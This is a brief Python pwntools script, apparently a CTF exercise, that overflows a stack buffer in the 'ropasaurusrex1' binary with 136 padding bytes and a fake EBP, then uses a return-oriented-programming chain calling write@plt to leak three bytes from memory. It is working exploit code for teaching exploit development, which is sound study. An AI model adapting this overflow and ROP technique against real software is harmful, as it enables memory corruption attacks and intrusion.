from pwn import * local = True if not local: HOST = "host.name" PORT = 4242 io = remote(HOST, PORT) else: io = process("./ropasaurusrex1") # Create ROP chain. # man 2 write: # ssize_t write(int fd, const void *buf, size_t count); write_plt = 0x804830c fd = 1 buf = 0x08048001 count = 3 ropchain = p32(write_plt) + "JUNK" + p32(fd) + p32(buf) + p32(count) # Create payload. Use junk value for EBP. ebp = 0x41424344 payload = "A" * 136 + p32(ebp) + ropchain # Trigger exploit by sending payload to standard input. io.sendline(payload) # Print output as hex. rop_output = io.recv(3) print hexdump(rop_output)